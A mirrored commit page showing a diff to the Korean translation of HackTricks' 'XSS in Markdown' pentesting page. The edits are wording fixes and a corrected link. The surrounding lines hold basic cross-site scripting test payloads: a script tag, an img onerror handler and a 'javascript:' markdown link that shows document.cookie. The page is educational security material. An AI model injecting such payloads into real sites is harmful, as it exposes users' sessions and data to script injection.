maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-web/xss-cross-site-scripting/xss-in-markdown

Browse Source
This commit is contained in:
Translator 2025-01-26 09:38:15 +00:00
parent e0acd3c82f
commit 68fd2e2aa3
1 changed files with 3 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
View File

@ -6,7 +6,7 @@
### HTML 태그 ### HTML 태그
마크다운에서 XSS를 얻는 가장 일반적인 방법은 자바스크립트를 실행하는 일반 HTML 태그를 주입하는 것입니다. 여러 마크다운 해석기가 HTML도 용하기 때문입니다. 마크다운에서 XSS를 얻는 가장 일반적인 방법은 자바스크립트를 실행하는 일반 HTML 태그를 주입하는 것입니다. 여러 마크다운 해석기가 HTML도 용하기 때문입니다.
```html ```html
<!-- XSS with regular tags --> <!-- XSS with regular tags -->
<script> <script>
@ -14,11 +14,11 @@ alert(1)
</script> </script>
<img src="x" onerror="alert(1)" /> <img src="x" onerror="alert(1)" />
``` ```
더 많은 예시는 [hacktricks의 주요 XSS 페이지]()에서 찾을 수 있습니다. 더 많은 예시는 [hacktricks의 주요 XSS 페이지](README.md)에서 찾을 수 있습니다.
### Javascript 링크 ### Javascript 링크
HTML 태그가 옵션이 아니라면 항상 markdown 구문으로 시도해 볼 수 있습니다: HTML 태그가 옵션이 아니라면 항상 마크다운 구문으로 시도해 볼 수 있습니다:
```html ```html
<!-- markdow link to XSS, this usually always work but it requires interaction --> <!-- markdow link to XSS, this usually always work but it requires interaction -->
[a](javascript:prompt(document.cookie)) [a](javascript:prompt(document.cookie))